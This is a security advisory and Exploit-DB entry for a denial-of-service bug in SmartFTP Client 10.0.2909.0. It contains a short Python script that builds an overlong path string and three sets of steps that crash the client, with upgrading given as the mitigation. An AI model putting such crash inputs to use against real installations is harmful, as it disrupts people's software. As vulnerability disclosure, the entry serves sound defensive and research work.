Vendor: SmartFTP Client
By: Eric Salario
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: SmartFTP Client
Affected Version From: 10.0.2909.0
Affected Version To: 10.0.2909.0
Patch Exists: YES
Related CWE: N/A
CPE: a:smartftp:smartftp_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows 10 32 bit and 64 bit
2021

SmartFTP Client 10.0.2909.0 – ‘Multiple’ Denial of Service

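SmartFTP Client 10.0.2909.0 contains multiple denial-of-service conditions that allow an attacker to crash the client. The crash can be triggered in three ways: by opening a new FTPS (explicit) connection to a non-existing IP address with the content of the 'path.txt' generated by the Python script pasted into the Path field; by replacing the path in the path bar after such a connection has returned an error; or by clearing the history in the 'New Connection' bar and typing anything in it.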

Mitigation:

Upgrade to the latest version of SmartFTP Client.

Exploit-DB raw data:

# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit

=========================================================================

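# Build the Path field value: "//" followed by 423 "A" characters
buffer = "//"
buffer += "A" * 423

# Write the value to path.txt so it can be pasted into the Path field
with open("path.txt", "w") as f:
    f.write(buffer)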

1. Run the Python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non-existing IP the FTP server can't reach (e.g. 255.255.255.255)
4. In Path, copy and paste the content of the "path.txt" generated by the Python script
5. Click "OK"
6. SmartFTP client crashes

=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non-existing IP the FTP server can't reach (e.g. 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
4. SmartFTP client crashes